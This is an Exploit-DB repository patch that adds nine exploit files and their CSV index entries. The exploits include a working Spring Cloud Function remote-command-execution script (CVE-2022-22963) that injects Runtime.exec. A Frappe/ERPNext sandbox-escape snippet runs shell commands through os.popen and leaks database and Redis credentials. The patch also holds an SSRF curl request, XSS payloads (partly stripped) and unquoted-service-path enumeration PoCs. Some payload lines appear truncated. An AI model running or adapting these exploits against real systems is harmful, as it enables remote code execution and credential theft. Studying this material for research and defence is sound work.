From 00f5021452890a2ed68ffb72bb4bddc175d969ab Mon Sep 17 00:00:00 2001 From: Exploit-DB Date: Wed, 12 Jul 2023 00:16:54 +0000 Subject: [PATCH] DB: 2023-07-12 10 changes to exploits/shellcodes/ghdb Ateme TITAN File 3.9 - SSRF File Enumeration Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS) Spring Cloud 3.2.2 - Remote Command Execution (RCE) BuildaGate5library v5 - Reflected Cross-Site Scripting (XSS) Park Ticketing Management System 1.0 - 'viewid' SQL Injection Park Ticketing Management System 1.0 - 'viewid' SQL Injection Frappe Framework (ERPNext) 13.4.0 - Remote Code Execution (Authenticated) AVG Anti Spyware 7.5 - Unquoted Service Path _AVG Anti-Spyware Guard_ Game Jackal Server v5 - Unquoted Service Path _GJServiceV5_ MiniTool Partition Wizard ShadowMaker v.12.7 - Unquoted Service Path _MTAgentService_ MiniTool Partition Wizard ShadowMaker v.12.7 - Unquoted Service Path _MTSchedulerService_ --- exploits/hardware/webapps/51582.txt | 71 +++++++++++++++++++++++++++++ exploits/java/webapps/51576.txt | 17 +++++++ exploits/java/webapps/51577.py | 23 ++++++++++ exploits/php/webapps/51581.txt | 16 +++++++ exploits/python/webapps/51580.txt | 47 +++++++++++++++++++ exploits/windows/local/51578.txt | 34 ++++++++++++++ exploits/windows/local/51579.txt | 34 ++++++++++++++ exploits/windows/local/51583.txt | 34 ++++++++++++++ exploits/windows/local/51584.txt | 38 +++++++++++++++ files_exploits.csv | 13 +++++- 10 files changed, 325 insertions(+), 2 deletions(-) create mode 100644 exploits/hardware/webapps/51582.txt create mode 100644 exploits/java/webapps/51576.txt create mode 100755 exploits/java/webapps/51577.py create mode 100644 exploits/php/webapps/51581.txt create mode 100644 exploits/python/webapps/51580.txt create mode 100644 exploits/windows/local/51578.txt create mode 100644 exploits/windows/local/51579.txt create mode 100644 exploits/windows/local/51583.txt create mode 100644 exploits/windows/local/51584.txt diff --git a/exploits/hardware/webapps/51582.txt b/exploits/hardware/webapps/51582.txt new file mode 100644 index 000000000..d4075cf8a --- /dev/null +++ b/exploits/hardware/webapps/51582.txt @@ -0,0 +1,71 @@ +#Exploit Title: Ateme TITAN File 3.9 - SSRF File Enumeration +#Exploit Author: LiquidWorm + + +Vendor: Ateme +Product web page: https://www.ateme.com +Affected version: 3.9.12.4 + 3.9.11.0 + 3.9.9.2 + 3.9.8.0 + +Summary: TITAN File is a multi-codec/format video transcoding +software, for mezzanine, STB and ABR VOD, PostProduction, Playout +and Archive applications. TITAN File is based on ATEME 5th Generation +STREAM compression engine and delivers the highest video quality +at minimum bitrates with accelerated parallel processing. + +Desc: Authenticated Server-Side Request Forgery (SSRF) vulnerability +exists in the Titan File video transcoding software. The application +parses user supplied data in the job callback url GET parameter. Since +no validation is carried out on the parameter, an attacker can specify +an external domain and force the application to make an HTTP/DNS/File +request to an arbitrary destination. This can be used by an external +attacker for example to bypass firewalls and initiate a service, file +and network enumeration on the internal network through the affected +application. + +Tested on: Microsoft Windows + NodeJS + Ateme KFE Software + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2023-5781 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5781.php + + +22.04.2023 + +-- + + +curl -vk -H "X-TITAN-WEB-HASTOKEN: true" \ + -H "X-TITAN-WEB-TOKEN: 54E83A8B-E9E9-9C87-886A-12CB091AB251" \ + -H "User-Agent: sunee-mode" \ + "https://10.0.0.8/cmd?data=" + +Call to file://C:\\windows\\system.ini returned 0 + +--- + +HTTP from Server +---------------- + +POST / HTTP/1.1 +Host: ssrftest.zeroscience.mk +Accept: */* +Content-Type: application/xml +Content-Length: 192 + + + + 0000 + dummy test job + aborted + 50 + message + \ No newline at end of file diff --git a/exploits/java/webapps/51576.txt b/exploits/java/webapps/51576.txt new file mode 100644 index 000000000..fa1ccf2dd --- /dev/null +++ b/exploits/java/webapps/51576.txt @@ -0,0 +1,17 @@ +# Exploit Title: Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS) +# Exploit Author: tmrswrr +# Vendor Homepage: https://decapcms.org/docs/intro/ +# Software Link: https://github.com/decaporg/decap-cms +# Version: 2.10.192 +# Tested on: https://cms-demo.netlify.com + + +Description: + +1. Go to new post and write body field your payload: + +https://cms-demo.netlify.com/#/collections/posts + +Payload = + +2. After save it XSS payload will executed and see alert box \ No newline at end of file diff --git a/exploits/java/webapps/51577.py b/exploits/java/webapps/51577.py new file mode 100755 index 000000000..4ddde9f09 --- /dev/null +++ b/exploits/java/webapps/51577.py @@ -0,0 +1,23 @@ +# Exploit Title: Spring Cloud 3.2.2 - Remote Command Execution (RCE) +# Date: 07/07/2023 +# Exploit Author: GatoGamer1155, 0bfxgh0st +# Vendor Homepage: https://spring.io/projects/spring-cloud-function/ +# Description: Exploit to execute commands exploiting CVE-2022-22963 +# Software Link: https://spring.io/projects/spring-cloud-function +# CVE: CVE-2022-22963 + +import requests, argparse, json + +parser = argparse.ArgumentParser() +parser.add_argument("--url", type=str, help="http://172.17.0.2:8080/functionRouter", required=True) +parser.add_argument("--command", type=str, help="ping -c1 172.17.0.1", required=True) +args = parser.parse_args() + +print("\n\033[0;37m[\033[0;33m!\033[0;37m] It is possible that the output of the injected command is not reflected in the response, to validate if the server is vulnerable run a ping or curl to the attacking host\n") + +headers = {"spring.cloud.function.routing-expression": 'T(java.lang.Runtime).getRuntime().exec("%s")' % args.command } +data = {"data": ""} + +request = requests.post(args.url, data=data, headers=headers) +response = json.dumps(json.loads(request.text), indent=2) +print(response) \ No newline at end of file diff --git a/exploits/php/webapps/51581.txt b/exploits/php/webapps/51581.txt new file mode 100644 index 000000000..4d8e46059 --- /dev/null +++ b/exploits/php/webapps/51581.txt @@ -0,0 +1,16 @@ +# Exploit Title: BuildaGate5library v5 - Reflected Cross-Site Scripting (XSS) +# Date: 06/07/2023 +# Exploit Author: Idan Malihi +# Vendor Homepage: None +# Version: 5 +# Tested on: Microsoft Windows 10 Pro +# CVE : CVE-2023-36163 + +#PoC: +An attacker just needs to find the vulnerable parameter (mc=) and inject the JS code like: +'>
/tmp/pwned" +g=({k:v('os').popen(hax).read() for k,v in g.gi_frame.f_back.f_back.f_back.f_back.f_builtins.items() if 'import' in k}for x in(0,)) +for x in g:0 +``` + +Context: +- https://ur4ndom.dev/posts/2023-07-02-uiuctf-rattler-read/ +- https://gist.github.com/lebr0nli/c2fc617390451f0e5a4c31c87d8720b6 +- https://frappeframework.com/docs/v13/user/en/desk/scripting/server-script +- https://github.com/frappe/frappe/blob/v13.4.0/frappe/utils/safe_exec.py#L42 + +Bonus: + +More recent versions (14.40.1 as of writing) block `gi_frame` but there is still a read primitive to escape the sandbox via `format_map`: + +```python3 +hax = """ +{g.gi_frame.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_globals[frappe].local.conf} +""".strip() + +g=(frappe.msgprint(hax.format_map({'g': g}))for x in(0,)) +for x in g:0 +``` + +Which prints the Frappe config like database/redis credentials, etc. + +In the unlikely case that Werkzeug is running with `use_evalex`, you may use the above method to retreive the werkzeug secret PIN, then browse to `/console` (or raise an exception) for RCE. \ No newline at end of file diff --git a/exploits/windows/local/51578.txt b/exploits/windows/local/51578.txt new file mode 100644 index 000000000..d815cdfba --- /dev/null +++ b/exploits/windows/local/51578.txt @@ -0,0 +1,34 @@ +# Exploit Title: MiniTool Partition Wizard ShadowMaker v.12.7 - Unquoted Service Path +# Date: 06/07/2023 +# Exploit Author: Idan Malihi +# Vendor Homepage: https://www.minitool.com/ +# Software Link: https://www.minitool.com/download-center/ +# Version: 12.7 +# Tested on: Microsoft Windows 10 Pro +# CVE : CVE-2023-36164 + +# PoC + +C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """ +MTAgentService MTAgentService C:\Program Files (x86)\MiniTool ShadowMaker\AgentService.exe Auto + +C:\Users>sc qc MTAgentService +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: MTAgentService + TYPE : 110 WIN32_OWN_PROCESS (interactive) + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files (x86)\MiniTool ShadowMaker\AgentService.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : MTAgentService + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +C:\Users>systeminfo + +Host Name: DESKTOP-LA7J17P +OS Name: Microsoft Windows 10 Pro +OS Version: 10.0.19042 N/A Build 19042 +OS Manufacturer: Microsoft Corporation \ No newline at end of file diff --git a/exploits/windows/local/51579.txt b/exploits/windows/local/51579.txt new file mode 100644 index 000000000..627dccfa0 --- /dev/null +++ b/exploits/windows/local/51579.txt @@ -0,0 +1,34 @@ +# Exploit Title: MiniTool Partition Wizard ShadowMaker v.12.7 - Unquoted Service Path +# Date: 06/07/2023 +# Exploit Author: Idan Malihi +# Vendor Homepage: https://www.minitool.com/ +# Software Link: https://www.minitool.com/download-center/ +# Version: 12.7 +# Tested on: Microsoft Windows 10 Pro +# CVE : CVE-2023-36165 + +#PoC + +C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """ +MTSchedulerService MTSchedulerService C:\Program Files (x86)\MiniTool ShadowMaker\SchedulerService.exe Auto + +C:\Users>sc qc MTSchedulerService +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: MTSchedulerService + TYPE : 110 WIN32_OWN_PROCESS (interactive) + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files (x86)\MiniTool ShadowMaker\SchedulerService.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : MTSchedulerService + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +C:\Users>systeminfo + +Host Name: DESKTOP-LA7J17P +OS Name: Microsoft Windows 10 Pro +OS Version: 10.0.19042 N/A Build 19042 +OS Manufacturer: Microsoft Corporation \ No newline at end of file diff --git a/exploits/windows/local/51583.txt b/exploits/windows/local/51583.txt new file mode 100644 index 000000000..05a721942 --- /dev/null +++ b/exploits/windows/local/51583.txt @@ -0,0 +1,34 @@ +# Exploit Title: AVG Anti Spyware 7.5 - Unquoted Service Path +# Date: 06/07/2023 +# Exploit Author: Idan Malihi +# Vendor Homepage: https://www.avg.com +# Software Link: https://www.avg.com/en-ww/homepage#pc +# Version: 7.5 +# Tested on: Microsoft Windows 10 Pro +# CVE : CVE-2023-36167 + +#PoC + +C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """ +AVG Anti-Spyware Guard AVG Anti-Spyware Guard C:\Program Files (x86)\Grisoft\AVG Anti-Spyware 7.5\guard.exe Auto + +C:\Users>sc qc "AVG Anti-Spyware Guard" +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: AVG Anti-Spyware Guard + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files (x86)\Grisoft\AVG Anti-Spyware 7.5\guard.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : AVG Anti-Spyware Guard + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +C:\Users>systeminfo + +Host Name: DESKTOP-LA7J17P +OS Name: Microsoft Windows 10 Pro +OS Version: 10.0.19042 N/A Build 19042 +OS Manufacturer: Microsoft Corporation \ No newline at end of file diff --git a/exploits/windows/local/51584.txt b/exploits/windows/local/51584.txt new file mode 100644 index 000000000..71a74c475 --- /dev/null +++ b/exploits/windows/local/51584.txt @@ -0,0 +1,38 @@ +# Exploit Title: Game Jackal Server v5 - Unquoted Service Path +# Date: 06/07/2023 +# Exploit Author: Idan Malihi +# Vendor Homepage: https://www.allradiosoft.ru +# Software Link: https://www.allradiosoft.ru/en/ss/index.htm +# Version: 5 +# Tested on: Microsoft Windows 10 Pro +# CVE : CVE-2023-36166 + +#PoC + +C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i +auto | findstr /i /v "C:\Windows\\" | findstr /i /v """ +Game Jackal Server v5 + GJServiceV5 C:\Program Files +(x86)\SlySoft\Game Jackal v5\Server.exe Auto + +C:\Users>sc qc GJServiceV5 +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: GJServiceV5 + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files (x86)\SlySoft\Game Jackal +v5\Server.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Game Jackal Server v5 + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +C:\Users>systeminfo + +Host Name: DESKTOP-LA7J17P +OS Name: Microsoft Windows 10 Pro +OS Version: 10.0.19042 N/A Build 19042 +OS Manufacturer: Microsoft Corporation \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 999d044cb..dbeb5d010 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -4043,6 +4043,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 41572,exploits/hardware/webapps/41572.txt,"ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Session Stealing",2017-03-08,"Bruno Bierbaumer",webapps,hardware,,2017-03-10,2017-03-10,0,CVE-2017-6549,,,,,https://bierbaumer.net/security/asuswrt/ 44937,exploits/hardware/webapps/44937.txt,"AsusWRT RT-AC750GF - Cross-Site Request Forgery (Change Admin Password)",2018-06-25,Wadeek,webapps,hardware,80,2018-06-25,2018-06-25,0,,"Cross-Site Request Forgery (CSRF)",,,, 39962,exploits/hardware/webapps/39962.txt,"ATCOM PBX IP01 / IP08 / IP4 / IP2G4A - Authentication Bypass",2016-06-16,i-Hmx,webapps,hardware,80,2016-06-16,2016-06-16,0,,,,,, +51582,exploits/hardware/webapps/51582.txt,"Ateme TITAN File 3.9 - SSRF File Enumeration",2023-07-11,LiquidWorm,webapps,hardware,,2023-07-11,2023-07-11,0,,,,,, 49124,exploits/hardware/webapps/49124.py,"ATX MiniCMTS200a Broadband Gateway 2.0 - Credential Disclosure",2020-11-30,"Zagros Bingol",webapps,hardware,,2020-11-30,2020-11-30,0,,,,,, 46896,exploits/hardware/webapps/46896.txt,"AUO Solar Data Recorder < 1.3.0 - 'addr' Cross-Site Scripting",2019-05-22,Luca.Chiou,webapps,hardware,,2019-05-22,2019-05-29,0,CVE-2019-11368,,,,, 46957,exploits/hardware/webapps/46957.txt,"AUO Solar Data Recorder < 1.3.0 - Incorrect Access Control",2019-06-03,Luca.Chiou,webapps,hardware,,2019-06-03,2019-06-03,0,,,,,, @@ -5526,6 +5527,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 32574,exploits/java/webapps/32574.txt,"MoinMoin 1.5.8/1.9 - Cross-Site Scripting / Information Disclosure",2008-11-09,"Xia Shing Zee",webapps,java,,2008-11-09,2014-03-29,1,OSVDB-49752;OSVDB-105626,,,,,https://www.securityfocus.com/bid/32208/info 38130,exploits/java/webapps/38130.txt,"N-able N-central - Cross-Site Request Forgery",2012-12-13,Cartel,webapps,java,,2012-12-13,2017-05-12,1,,,,,,https://www.securityfocus.com/bid/56933/info 51205,exploits/java/webapps/51205.py,"Nacos 2.0.3 - Access Control vulnerability",2023-04-03,"Jenson Zhao",webapps,java,,2023-04-03,2023-04-03,0,CVE-2021-43116,,,,, +51576,exploits/java/webapps/51576.txt,"Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS)",2023-07-11,tmrswrr,webapps,java,,2023-07-11,2023-07-11,0,,,,,, 49724,exploits/java/webapps/49724.txt,"Novel Boutique House-plus 3.5.1 - Arbitrary File Download",2021-03-29,tuyiqiang,webapps,java,,2021-03-29,2021-03-29,0,,,,,, 26001,exploits/java/webapps/26001.txt,"Novell Groupwise 6.5 Webaccess - HTML Injection",2005-07-15,"Francisco Amato",webapps,java,,2005-07-15,2013-06-07,1,CVE-2005-2276;OSVDB-18064,,,,,https://www.securityfocus.com/bid/14310/info 32909,exploits/java/webapps/32909.txt,"Novell Teaming 1.0 - User Enumeration / Multiple Cross-Site Scripting Vulnerabilities",2009-04-15,"Michael Kirchner",webapps,java,,2009-04-15,2019-03-28,1,CVE-2009-1294;OSVDB-53937,,,,,https://www.securityfocus.com/bid/34531/info @@ -5577,6 +5579,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 39418,exploits/java/webapps/39418.txt,"Solr 3.5.0 - Arbitrary Data Deletion",2016-02-08,N37,webapps,java,,2016-02-14,2016-02-14,1,,,,http://www.exploit-db.com/screenshots/idlt39500/captura-de-pantalla-de-2016-02-14-185026.png,http://www.exploit-db.comapache-solr-3.5.0.tgz, 49385,exploits/java/webapps/49385.py,"Sonatype Nexus 3.21.1 - Remote Code Execution (Authenticated)",2021-01-06,1F98D,webapps,java,,2021-01-06,2021-01-08,1,CVE-2020-10199,,,,, 33687,exploits/java/webapps/33687.txt,"Sparta Systems TrackWise EQms - Multiple Cross-Site Scripting Vulnerabilities",2010-03-02,"Yaniv Miron",webapps,java,,2010-03-02,2014-06-09,1,,,,,,https://www.securityfocus.com/bid/38483/info +51577,exploits/java/webapps/51577.py,"Spring Cloud 3.2.2 - Remote Command Execution (RCE)",2023-07-11,GatoGamer1155,webapps,java,,2023-07-11,2023-07-11,0,CVE-2022-22963,,,,, 46772,exploits/java/webapps/46772.rb,"Spring Cloud Config 2.1.x - Path Traversal (Metasploit)",2019-04-30,"Dhiraj Mishra",webapps,java,8888,2019-04-30,2019-04-30,0,CVE-2019-3799,"Metasploit Framework (MSF)",,,, 46772,exploits/java/webapps/46772.rb,"Spring Cloud Config 2.1.x - Path Traversal (Metasploit)",2019-04-30,"Dhiraj Mishra",webapps,java,8888,2019-04-30,2019-04-30,0,CVE-2019-3799,Traversal,,,, 50799,exploits/java/webapps/50799.py,"Spring Cloud Gateway 3.1.0 - Remote Code Execution (RCE)",2022-03-07,"Carlos E. Vieira",webapps,java,,2022-03-07,2022-03-07,0,CVE-2022-22947,,,,, @@ -15104,6 +15107,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 4103,exploits/php/webapps/4103.txt,"bugmall shopping cart 2.5 - SQL Injection / Cross-Site Scripting",2007-06-25,t0pP8uZz,webapps,php,,2007-06-24,,1,OSVDB-40152;CVE-2007-3448;OSVDB-38223;CVE-2007-3447;OSVDB-38205;CVE-2007-3446,,,,,http://www.h4cky0u.org/viewtopic.php?t=26834 15509,exploits/php/webapps/15509.txt,"Build a Niche Store 3.0 - 'BANS' Authentication Bypass",2010-11-13,"ThunDEr HeaD",webapps,php,,2010-11-13,2010-11-13,0,,,,,, 3947,exploits/php/webapps/3947.txt,"Build it Fast (bif3) 0.4.1 - Multiple Remote File Inclusions",2007-05-17,"Alkomandoz Hacker",webapps,php,,2007-05-16,,1,OSVDB-37955;CVE-2007-2762;OSVDB-37954;OSVDB-37953;OSVDB-37952;OSVDB-37951;OSVDB-37950;OSVDB-37949,,,,, +51581,exploits/php/webapps/51581.txt,"BuildaGate5library v5 - Reflected Cross-Site Scripting (XSS)",2023-07-11,"Idan Malihi",webapps,php,,2023-07-11,2023-07-11,0,CVE-2023-36163,,,,, 40390,exploits/php/webapps/40390.php,"BuilderEngine 3.5.0 - Arbitrary File Upload",2016-09-19,metanubix,webapps,php,80,2016-09-19,2016-09-26,1,,,,,http://www.exploit-db.comBuilderEngine-CMS-V3.zip, 29697,exploits/php/webapps/29697.txt,"Built2go News Manager 1.0 Blog - 'news.php' Multiple Cross-Site Scripting Vulnerabilities",2007-03-01,the_Edit0r,webapps,php,,2007-03-01,2013-11-19,1,CVE-2007-1248;OSVDB-33821,,,,,https://www.securityfocus.com/bid/22783/info 29698,exploits/php/webapps/29698.txt,"Built2go News Manager 1.0 Blog - 'rating.php?nid' Cross-Site Scripting",2007-03-01,the_Edit0r,webapps,php,,2007-03-01,2013-11-19,1,CVE-2007-1248;OSVDB-33822,,,,,https://www.securityfocus.com/bid/22783/info @@ -25469,9 +25473,9 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 41730,exploits/php/webapps/41730.txt,"Parcel Delivery Booking Script 1.0 - SQL Injection",2017-03-26,"Ihsan Sencan",webapps,php,,2017-03-26,2017-03-27,0,,,,,, 7851,exploits/php/webapps/7851.php,"Pardal CMS 0.2.0 - Blind SQL Injection",2009-01-22,darkjoker,webapps,php,,2009-01-21,2017-01-23,1,OSVDB-51642;CVE-2009-0279,,,,http://www.exploit-db.compardalcms-0.2.0.tar.bz2, 2955,exploits/php/webapps/2955.txt,"Paristemi 0.8.3b - 'buycd.php' Remote File Inclusion",2006-12-19,nuffsaid,webapps,php,,2006-12-18,2016-09-21,1,OSVDB-35709;CVE-2006-6739,,,,http://www.exploit-db.comparistemi-0_8_3.zip, -48662,exploits/php/webapps/48662.txt,"Park Ticketing Management System 1.0 - 'viewid' SQL Injection",2020-07-13,gh1mau,webapps,php,,2020-07-13,2020-07-13,0,,,,,, +48662,exploits/php/webapps/48662.txt,"Park Ticketing Management System 1.0 - 'viewid' SQL Injection",2020-07-13,gh1mau,webapps,php,,2020-07-13,2023-07-11,1,,,,,, 48663,exploits/php/webapps/48663.txt,"Park Ticketing Management System 1.0 - Authentication Bypass",2020-07-13,gh1mau,webapps,php,,2020-07-13,2020-07-13,0,,,,,, -49503,exploits/php/webapps/49503.txt,"Park Ticketing Management System 1.0 - 'viewid' SQL Injection",2021-02-01,"Zeyad Azima",webapps,php,,2021-02-01,2021-02-01,0,,,,,, +49503,exploits/php/webapps/49503.txt,"Park Ticketing Management System 1.0 - 'viewid' SQL Injection",2021-02-01,"Zeyad Azima",webapps,php,,2021-02-01,2023-07-11,1,,,,,, 12767,exploits/php/webapps/12767.txt,"parlic Design - SQL Injection / Cross-Site Scripting / HTML Injection",2010-05-27,XroGuE,webapps,php,,2010-05-26,,1,,,,,, 17231,exploits/php/webapps/17231.txt,"Parnian Opendata CMS - SQL Injection",2011-05-02,Alexander,webapps,php,,2011-05-02,2011-05-02,1,,,,,, 45810,exploits/php/webapps/45810.txt,"Paroiciel 11.20 - 'tRecIdListe' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,80,2018-11-12,2018-11-13,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.compar6lus_11_20160225.exe, @@ -34562,6 +34566,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 47879,exploits/python/webapps/47879.md,"Django < 3.0 < 2.2 < 1.11 - Account Hijack",2019-12-24,"Ryuji Tsutsui",webapps,python,,2020-01-06,2020-04-13,1,CVE-2019-19844,,,,,https://ryu22e.org/en/posts/2019/12/25/django-cve-2019-19844/ 40129,exploits/python/webapps/40129.txt,"Django CMS 3.3.0 - Editor Snippet Persistent Cross-Site Scripting",2016-07-20,Vulnerability-Lab,webapps,python,80,2016-07-20,2016-07-20,1,CVE-2016-6186,,,,http://www.exploit-db.comdjango-1.10b1.tar.gz,https://www.vulnerability-lab.com/get_content.php?id=1869 50393,exploits/python/webapps/50393.txt,"django-unicorn 0.35.3 - Stored Cross-Site Scripting (XSS)",2021-10-08,"Raven Security Associates",webapps,python,,2021-10-08,2021-10-08,0,CVE-2021-42053,,,,, +51580,exploits/python/webapps/51580.txt,"Frappe Framework (ERPNext) 13.4.0 - Remote Code Execution (Authenticated)",2023-07-11,"Sander Ferdinand",webapps,python,,2023-07-11,2023-07-11,0,,,,,, 49495,exploits/python/webapps/49495.py,"Home Assistant Community Store (HACS) 1.10.0 - Directory Traversal",2021-01-29,Lyghtnox,webapps,python,,2021-01-29,2021-11-01,0,,,,,, 46386,exploits/python/webapps/46386.py,"Jinja2 2.10 - 'from_string' Server Side Template Injection",2019-02-15,JameelNabbo,webapps,python,,2019-02-15,2019-02-15,0,CVE-2019-8341,,,,http://www.exploit-db.comJinja2-2.10.tar.gz, 51109,exploits/python/webapps/51109.txt,"Label Studio 1.5.0 - Authenticated Server Side Request Forgery (SSRF)",2023-03-28,"Ryan Smith",webapps,python,,2023-03-28,2023-03-28,0,CVE-2022-36551,,,,, @@ -39409,6 +39414,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 839,exploits/windows/local/839.cpp,"Avaya IP Office Phone Manager - Local Password Disclosure",2005-02-24,"Adrian _pagvac_ Pastor",local,windows,,2005-02-23,,1,OSVDB-14206;CVE-2005-0506,,,,, 17877,exploits/windows/local/17877.py,"AVCon - DEP Bypass",2011-09-20,blake,local,windows,,2011-09-20,2011-09-24,1,OSVDB-84578,,,http://www.exploit-db.com/screenshots/idlt18000/17877.png,http://www.exploit-db.comavcon.exe, 12528,exploits/windows/local/12528.pl,"AVCON H323Call - Local Buffer Overflow",2010-05-07,"Dillon Beresford",local,windows,,2010-05-06,2011-03-03,1,,,,,http://www.exploit-db.comavcon.exe, +51583,exploits/windows/local/51583.txt,"AVG Anti Spyware 7.5 - Unquoted Service Path _AVG Anti-Spyware Guard_",2023-07-11,"Idan Malihi",local,windows,,2023-07-11,2023-07-11,0,CVE-2023-36167,,,,, 35993,exploits/windows/local/35993.c,"AVG Internet Security 2015.0.5315 - Arbitrary Write Privilege Escalation",2015-02-04,"Parvez Anwar",local,windows,,2015-02-04,2015-02-04,0,CVE-2014-9632;OSVDB-113824,,,,, 18109,exploits/windows/local/18109.rb,"Aviosoft Digital TV Player Professional 1.0 - Local Stack Buffer Overflow (Metasploit)",2011-11-13,Metasploit,local,windows,,2011-11-13,2011-11-13,1,OSVDB-77043,"Metasploit Framework (MSF)",,,http://www.exploit-db.comAviosoftDTVPlayerPro.exe, 22932,exploits/windows/local/22932.py,"Aviosoft Digital TV Player Professional 1.x - '.PLF' Direct Retn",2012-11-26,Nezim,local,windows,,2012-11-26,2017-08-17,1,OSVDB-77043,,,http://www.exploit-db.com/screenshots/idlt23000/screen-shot-2012-11-26-at-120023-pm.png,http://www.exploit-db.comAviosoftDTVPlayerPro.exe, @@ -39988,6 +39994,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 10339,exploits/windows/local/10339.pl,"gAlan 0.2.1 - Local Buffer Overflow (1)",2009-12-07,"Jeremy Brown",local,windows,,2009-12-06,,1,OSVDB-60897,,,,http://www.exploit-db.comgalan-0.2.1-win32.zip, 16664,exploits/windows/local/16664.rb,"gAlan 0.2.1 - Local Buffer Overflow (Metasploit) (2)",2010-09-25,Metasploit,local,windows,,2010-09-25,2011-03-10,1,OSVDB-60897,"Metasploit Framework (MSF)",,,, 10346,exploits/windows/local/10346.rb,"gAlan 0.2.1 - Universal Buffer Overflow (Metasploit)",2009-12-07,loneferret,local,windows,,2009-12-06,,1,,"Metasploit Framework (MSF)",,,http://www.exploit-db.comgalan-0.2.1-win32.zip, +51584,exploits/windows/local/51584.txt,"Game Jackal Server v5 - Unquoted Service Path _GJServiceV5_",2023-07-11,"Idan Malihi",local,windows,,2023-07-11,2023-07-11,0,CVE-2023-36166,,,,, 40069,exploits/windows/local/40069.cpp,"GE Proficy HMI/SCADA CIMPLICITY 8.2 - Local Privilege Escalation",2016-07-07,"Zhou Yu",local,windows,,2016-07-07,2016-07-07,0,,,,,, 41972,exploits/windows/local/41972.txt,"Gemalto SmartDiag Diagnosis Tool < 2.5 - Local Buffer Overflow (SEH)",2017-05-08,"Majid Alqabandi",local,windows,,2017-05-08,2017-05-09,1,CVE-2017-6953,,,http://www.exploit-db.com/screenshots/idlt42000/screen-shot-2017-05-08-at-152336.png,http://www.exploit-db.comSmartDiag_en.msi, 49007,exploits/windows/local/49007.txt,"Genexus Protection Server 9.6.4.2 - 'protsrvservice' Unquoted Service Path",2020-11-09,SamAlucard,local,windows,,2020-11-09,2020-11-09,0,,,,,, @@ -40815,6 +40822,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 15575,exploits/windows/local/15575.py,"MiniShare 1.5.5 - 'users.txt' Local Buffer Overflow (Egghunter)",2010-11-19,0v3r,local,windows,,2010-11-20,2016-09-16,1,,,,http://www.exploit-db.com/screenshots/idlt16000/15575.png,http://www.exploit-db.comminishare-1.5.5.zip, 15406,exploits/windows/local/15406.rb,"MiniShare 1.5.5 - 'users.txt' Local Buffer Overflow (SEH)",2010-11-03,"Muhamad Fadzil Ramli",local,windows,,2010-11-03,2018-12-19,1,,,,,http://www.exploit-db.comminishare-1.5.5.zip, 50859,exploits/windows/local/50859.txt,"MiniTool Partition Wizard - Unquoted Service Path",2022-04-11,"Saud Alenazi",local,windows,,2022-04-11,2022-04-11,0,,,,,, +51578,exploits/windows/local/51578.txt,"MiniTool Partition Wizard ShadowMaker v.12.7 - Unquoted Service Path _MTAgentService_",2023-07-11,"Idan Malihi",local,windows,,2023-07-11,2023-07-11,0,CVE-2023-36164,,,,, +51579,exploits/windows/local/51579.txt,"MiniTool Partition Wizard ShadowMaker v.12.7 - Unquoted Service Path _MTSchedulerService_",2023-07-11,"Idan Malihi",local,windows,,2023-07-11,2023-07-11,0,CVE-2023-36165,,,,, 49336,exploits/windows/local/49336.txt,"MiniTool ShadowMaker 3.2 - 'MTAgentService' Unquoted Service Path",2021-01-04,"Thalia Nieto",local,windows,,2021-01-04,2021-01-04,0,,,,,, 19993,exploits/windows/local/19993.txt,"Mirabilis ICQ 2000.0 A - Mailclient Temporary Link",2000-06-06,"Gert Fokkema",local,windows,,2000-06-06,2012-07-21,1,CVE-2000-0552;OSVDB-1376,,,,,https://www.securityfocus.com/bid/1307/info 17230,exploits/windows/local/17230.rb,"MJM Core Player 2011 - '.s3m' Local Stack Buffer 